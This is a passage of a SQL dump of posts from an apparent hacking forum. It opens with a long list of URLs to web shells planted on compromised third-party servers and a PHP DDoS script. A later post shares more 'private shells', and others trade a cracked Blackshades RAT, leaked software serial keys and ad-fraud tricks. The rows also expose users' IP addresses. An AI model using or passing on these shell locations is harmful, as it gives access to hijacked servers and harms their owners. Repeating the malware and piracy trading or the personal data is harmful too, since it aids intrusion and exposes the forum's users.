http://www.dinamo.com.nu/php/ http://firman-mannte.blogspot.com/ http://www.1100f.com/member/ http://www.tux-planet.fr/public/hack/ddos/php-dos.phps http://niyuavalon.webege.com/phpddos/control/ http://tinypaste.com/e38333 http://dinamo.com.nu/php/ http://avatarmovieonline.110mb.com/ http://pulsar-tec.com/ http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://virusgamingz.roxorgamers.com/ http://www.fahriozturk.tr.gg/111.htm/ http://pastie.org/pastes/1044528/download http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://www.fahriozturk.tr.gg/111.htm http://firman-mannte.blogspot.com/2011_04_01_archive.html http://toutsourtous.anatoile.com/html.php?id_menu=3206841 http://eq22.weebly.com/ http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/ http://zhan.liechesk.cn/hechihuagong.com.cn-domain http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b... http://pastie.org/pastes/1044528/download/ http://www.sidarglobal.com/help.php http://gfdgdfgfdgfd.co.cc/shell.php http://163.178.170.74/webdav/greenshell.php http://www.theresahackforthat.webs.com/shell.php http://www.ecofilms.gr/search_gr.asp http://82.114.168.38/webdav/greenshell.php http://theresahackforthat.webs.com/shell.php http://216.52.226.103/webdav/rlb.php http://mmx1.webs.com/shell.php http://mapi.co.kr/zb41pl7/bbs/data/mapi_bbs/settings.php http://www.gfdgdfgfdgfd.co.cc/shell.php http://www.windowsecurity.com/faqs/Trojans/ http://203.153.230.78/webdav/config.php http://tools.rosinstrument.com/proxy/?rule1 http://shells.red-pill.eu/ http://82.114.168.38/webdav/greenshell.php?act=phptools&host=/ http://www.ecofilms.gr/search_gr.asp?act=phptools&.../ http://www.ecofilms.gr/search_gr.asp?act=phptools/ http://shells.red-pill.eu http://www.ecofilms.gr/search_gr.asp?act=phptools http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass http://www.ecofilms.gr/search_gr.asp?act...ols http://sockslist.net/proxy/server-socks-hide-ip-address/91 http://www.ecofilms.gr/search_gr.asp?act=phptools&.../ http://sockslist.net/proxy/server-socks-hide-ip-address/2#proxylist http://www.webadminblog.com/index.php/tag/network/ http://sockslist.net/proxy/server-socks-hide-ip-address/3 http://www.ecofilms.gr/search_gr.asp?&.../ http://www.ecofilms.gr/search_gr.asp?act...ols/ http://www.ecofilms.gr/search_gr.asp?act=phptools&host=/ http://www.ecofilms.gr/search_gr.asp?act...ols&hos... http://203.153.230.78/webdav/config.php?act=phptools&host=/ http://www.ecofilms.gr/search_gr.asp?act...ols&host=/ http://www.ecofilms.gr/search_gr.asp?&.../ http://www.ecofilms.gr/search_gr.asp?act=phptools&... http://clintonacademy.org/2007Women/yummy.php http://81.149.25.109/webdav/sprint.php http://www.octcca.org/wp-content/uploads/2010/12/yummy.php http://www.riversidesbc.com/calendar/images/yummy.php [/code] [/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f4a5755979022089d59a3163a2cbc442', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7324', '1240', '0', '81', 'Some private shells', '0', '1', 't3h jok3r', '1352524892', 'http://187.33.159.118/webdav/shellajejas.php http://200.128.81.23/webdav/shellajejas.php http://74.91.116.127/webdav/shellajejas.php http://187.48.62.39/webdav/shellajejas.php http://118.97.164.18/webdav/shellajejas.php http://222.127.10.240/webdav/shellajejas.php http://119.82.231.91/webdav/shellajejas.php http://193.140.142.110/webdav/shellajejas.php http://188.173.78.190/webdav/shellajejas.php http://120.72.85.84/webdav/shellajejas.php Enjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7874c38fc1cd2dd959e4ac6880829ee0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7325', '1241', '0', '35', 'New Userbars- Voting', '0', '1', 't3h jok3r', '1352525168', 'I picked a couple of new userbars I was wondering if we should change the userbars or not. If the majority says change then here are the options. [b]Set # 1[/b] [url=http://help.forumotion.com/t103332-glow-forum-ranks][img]http://www.thomasbenacci.co.uk/files/Glow_Forum_Ranks_Sample.png[/img][/url] [b]Set # 2[/b] [url=http://help.forumotion.com/t97368-rank-s-black-neon-with-psd][img]http://fc01.deviantart.net/fs70/i/2011/268/c/a/rank_psd_black_neon_by_mazeko-d37obbc.png[/img][/url] [b]Set # 3[/b] [url=http://help.forumotion.com/t116368-green-and-grey-forum-ranks][img]http://i32.servimg.com/u/f32/16/52/57/78/previe18.png[/img][/url] [b]Set # 4[/b] The Current ones NOTE: I will download the PSD file and edit it, these are just an example.', '72.231.24.165', '1223104677', '1', '0', '1', '1352580669', '1', '337a40b8da0428c06d8f46297dbda84b', '0', '1352580669'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7326', '1213', '7214', '34', 'RE: Black Sleek Thread Design .PSD', '0', '9', 'p420', '1352525677', '[quote=\'VirtualLegend\' pid=\'7214\' dateline=\'1352315542\'] Looks Nice, Did you made it? [/quote] Yeah i made this for someone but then they leaked it on to other sites then carried on.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2f2380c6b60cd0df8c6d9a3d83aa8eeb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7327', '1242', '0', '34', 'Another thread design PSD', '0', '9', 'p420', '1352525738', 'Preview [img]http://i.minus.com/iviyf4yv1AZMB.png[/img] [b][color=#FF0000]Post to see download link.[/color][/b] [lock] Link http://adf.ly/EJH0k [/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0f532e9b3af96a03aa85abd4bc8d72f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7328', '1040', '5986', '61', 'RE: How To Get Passes To Porn Sites', '0', '9', 'p420', '1352525925', 'Thanks I tried it today and it worked :D', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '88147b0841278b27e9ba5696d2cfc37d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7329', '812', '4261', '61', 'RE: Skype resolvers [WEB BASED]', '0', '9', 'p420', '1352526024', 'Thanks a bunch. Does the API still work and asylum booters skype resolver is great.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '396175ed671ab5534b3ebabd35facc24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7330', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '258', 'PiXEL^OG', '1352526620', 'I could use some extra cash , Thanks ;D', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '760dc6d852c4a6dab8c9ac159f48ebf0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7331', '1220', '7193', '12', 'RE: Big list Hacking tutorials with .txt', '0', '258', 'PiXEL^OG', '1352526732', 'This looks very nice , Another HQ thread by you Reloadzor! :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '1fc1adb55bd11e49a99984e60c807386', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7332', '1211', '7170', '18', 'RE: Facebook Blaster Pro v10.0', '0', '9', 'p420', '1352526819', 'Oh this shit tight thanks.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a089197e983e8ebd52fd8b493a156178', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7334', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '4', 'Triple H', '1352527172', 'i just watch online movies', '49.248.27.150', '838343574', '1', '0', '0', '0', '1', '9a8646381bb6967ca3eee8864ec8c5fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7335', '1225', '7249', '25', 'RE: [Serials] Malwarebytes Full keys Dump', '0', '8', 'spacefish36', '1352527686', 'Thanks this still works. I was looking for these few weeks ago and finally found some when I gave up lol.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a491139b60009ac62233e79831246e6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7336', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1352527957', 'Triple H reached 123 posts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '491d504307af1e221c4e1d899f967aaf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7337', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '1', 't3h jok3r', '1352527982', 'I watch movies, play PS3 or exchange posts with other sites.', '72.231.24.165', '1223104677', '1', '0', '1', '1352528069', '1', '634ae05d8da6c79a9278af3057f1a1ed', '0', '1352528069'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7338', '1244', '0', '83', '[How to] Send a DMCA takedown notice', '0', '5', 'Timmy', '1352528646', 'I have realized that content nowadays have been leeched a lot therefore many people issue DMCA notices but some people don\'t know how. It\'s easy and I even got a template for you. [b]Template[/b] [quote] My name is [color=#FF0000]INSERT NAME[/color] and I am the [color=#FF0000]INSERT TITLE of INSERT COMPANY NAME[/color]. A website that your company hosts (according to WHOIS information) is infringing on at least one copyright owned by my company. An article was copied onto your servers without permission. The original [color=#FF0000]ARTICLE/PHOTO[/color], to which we own the exclusive copyrights, can be found at: [color=#FF0000]PROVIDE WEBSITE URL[/color] The unauthorized and infringing copy can be found at: [color=#FF0000]PROVIDE WEBSITE URL[/color] This letter is official notification under Section 512(c) of the Digital Millennium Copyright Act (”DMCA”), and I seek the removal of the aforementioned infringing material from your servers. I request that you immediately notify the infringer of this notice and inform them of their duty to remove the infringing material immediately, and notify them to cease any further posting of infringing material to your server in the future. Please also be advised that law requires you, as a service provider, to remove or disable access to the infringing materials upon receiving this notice. Under US law a service provider, such as yourself, enjoys immunity from a copyright lawsuit provided that you act with deliberate speed to investigate and rectify ongoing copyright infringement. If service providers do not investigate and remove or disable the infringing material this immunity is lost. Therefore, in order for you to remain immune from a copyright infringement action you will need to investigate and ultimately remove or otherwise disable the infringing material from your servers with all due speed should the direct infringer, your client, not comply immediately. I am providing this notice in good faith and with the reasonable belief that rights my company owns are being infringed. Under penalty of perjury I certify that the information contained in the notification is both true and accurate, and I have the authority to act on behalf of the owner of the copyright(s) involved. Should you wish to discuss this with me please contact me directly. Thank you. [color=#FF0000]/s/YOUR NAME Address City, State Zip Phone E-mail[/color] [/quote] If the site is using Cloudflare then send a DMCA to Cloudflare first to find out what hosting the site is using. Here\'s the link for Cloudflare. https://www.cloudflare.com/abuse/dmca Be sure to use the template above.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '404f05f52792ed1484896b84b39e4af1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7339', '426', '1940', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '1', 't3h jok3r', '1352529485', 'Downloaded it. Is this the same pack I gave you once Ipod? Anyway I verified that mediafire download ID g8qa22aqmftitlq is safe.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd3c7931844d55b4ae171b3c681194759', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7340', '1245', '0', '28', 'New Section Added in VIP tab', '0', '1', 't3h jok3r', '1352529862', 'I added \"other premium giveaways\" section in which you are allowed to post anything except dumps, programs and methods/tutorials. You are allowed to but not limited to distribute theme rips, exploits, VPNs, shells, plugins/addons, graphic designs, etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '189b879dd750641cd8333e712f579e42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7341', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1352530272', 'Ipod can you tell me where to put the app and data folder on windows?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0828878513a6799131c67ce7829454dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7342', '1167', '6826', '75', 'RE: Batman Arkham City Cheats', '0', '5', 'Timmy', '1352530472', 'No problem. Did you complete batman or are you still playing it?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2089684c781bc6450cf8027e21fdf175', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7343', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '5', 'Timmy', '1352530926', 'Thanks for Blackshades RAT.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9baa9cf9f61de42dd76d7a4e98bbe2c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7345', '1246', '0', '65', 'L33T Hacking Video', '0', '1', 't3h jok3r', '1352535067', 'Timmy made us a quick video to help us promote L33T Hacking! (It\'s special because I told him to make it and it\'s the first l33thacking.NET video. [video=youtube]https://www.youtube.com/watch?v=jnL4PDXdk7I[/video] Reviews? Note: It\'s better to watch in full screen.', '72.231.24.165', '1223104677', '1', '0', '1', '1352535361', '1', 'f73250ee9a92d62a721c94b7422d1e1f', '0', '1352535361'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7346', '253', '1106', '56', 'RE: Count to 200', '0', '7', 'Romdu62', '1352535773', '61. Cuz I have a R in my username.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5e37ded2c7a3bb97110c80db2a56a963', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7347', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '7', 'Romdu62', '1352535815', '[img]http://img820.imageshack.us/img820/3958/lw5fi.gif[/img]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '219172cb28e90e57085de57767e37fec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7348', '238', '1021', '56', 'RE: Ban the user above you', '0', '7', 'Romdu62', '1352535859', 'Banned for being the top poster.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f1cffc69e9f259fc8e87fb9003d194a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7349', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '7', 'Romdu62', '1352535902', '0/10 smart enough to have his email in his sig.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3aee22a8ff96c49c7dc63917fc022a41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7350', '197', '696', '56', 'RE: /me Thread', '0', '7', 'Romdu62', '1352535948', '/me is happy that Obama won.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd5e3caf5f0f558cf351a2101cbeb688f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7351', '487', '2354', '56', 'RE: Corrupt a wish', '0', '7', 'Romdu62', '1352536001', 'Granted but then you will get repfucked because you are a rep whore I wish I could make a time machine.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4b9841e3a958c09d1c3acaf25e001d39', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7352', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '7', 'Romdu62', '1352536047', 'Idevice customzing, jailbreaking etc section.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'de8227efa14f4ce690786072426cdf99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7353', '1232', '7304', '9', 'RE: Adfoc.us Trick', '0', '53', 'sirchamp', '1352536653', '[quote=\'iTzIpod\' pid=\'7304\' dateline=\'1352518006\'] I doubt it does Triple H. Sirchamp, why did you share the secret to your service? [/quote] Its \"public\". Everyone knows it on HF. This trick also works on linkc.at. But theres only a small chance that you will get paid out.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '4390940c2d6f04dbbfa67b3f68f03baa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7354', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '257', 'XxTREYZxX', '1352536919', 'Thanks for this hoping it will work.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '06ff0e30852b3b96eb70f12f4e6686d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7355', '1235', '7313', '42', 'RE: Marijuana legalized in two US states', '0', '53', 'sirchamp', '1352537238', 'For legalization of course. The prohibition is ridiculous. I hope it will be legalized here sometime. At the moment you only have to pay 100CHF(=90$) if you are found with 10gramms or less.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f5b73039df46f67a76aae41365896986', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7356', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1352537273', '0/10 dont even have one lol', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '4101095959290cd95c2467af2c2df35f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7357', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352537725', 'Banned for having 91 post', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'e32b664efb931b22fcf87c50cb73ca17', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7358', '1230', '7279', '49', 'RE: great suggestion', '0', '257', 'XxTREYZxX', '1352537850', 'Thanks guys hope we Get this happening. Triple H it would be up to the staff and admin and maybe me', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '65cdb34a1b1e519def0b05ddcafc1e91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7359', '1246', '7345', '65', 'RE: L33T Hacking Video', '0', '53', 'sirchamp', '1352539547', 'Actually not a bad video :D Thanks timmy. We should get a few more views though...', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6db24d8baf2328a089e6b30b682f8998', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7398', '1247', '0', '4', 'Hey Everybody!', '0', '342', 'Squirt1971', '1352571921', 'Hey guys I\'m new to this forum and I\'m hoping it can help me learn more on the immense topic of hacking. Glad to be here :D', '96.21.227.16', '1612047120', '0', '0', '0', '0', '1', 'd810d9320c6927a7e779f82ee47de1e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7361', '1245', '7340', '28', 'RE: New Section Added in VIP tab', '0', '257', 'XxTREYZxX', '1352548036', 'Thanks so much joker. This is great.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '24674e48ce04abfde7c62f2d31c17696', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7362', '238', '1021', '56', 'RE: Ban the user above you', '0', '228', 'VirtualLegend', '1352550229', 'Banned for having a shitty signature', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7685138f70e5cd32f5b60cb5d59d9730', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7363', '1246', '7345', '65', 'RE: L33T Hacking Video', '0', '228', 'VirtualLegend', '1352550333', 'Nice Video Everyone thumbs up it :D', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '77d7e9000d145f6aae7f6afbda0eda4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7364', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '228', 'VirtualLegend', '1352550375', 'Thanks but it still works', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'ae48db389d648eb46a75f424492f62b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7365', '1242', '7327', '34', 'RE: Another thread design PSD', '0', '228', 'VirtualLegend', '1352550454', 'Nice Thread Design Do you have one with a green theme ?', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'e56e60860d9d21dea100aaf0c57eb766', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7366', '1245', '7340', '28', 'RE: New Section Added in VIP tab', '0', '228', 'VirtualLegend', '1352550649', 'Good job Joker I\'m gonna post some VIP thread designs :P', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'ac62e0b88ed200c98fd1ec1a35f012cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7367', '1245', '7340', '28', 'RE: New Section Added in VIP tab', '0', '82', 'iTzIpod', '1352550776', 'Thanks for the notice and update to the forum, t3h jok3r.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '316d885577f4e4577754b6889d528609', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, 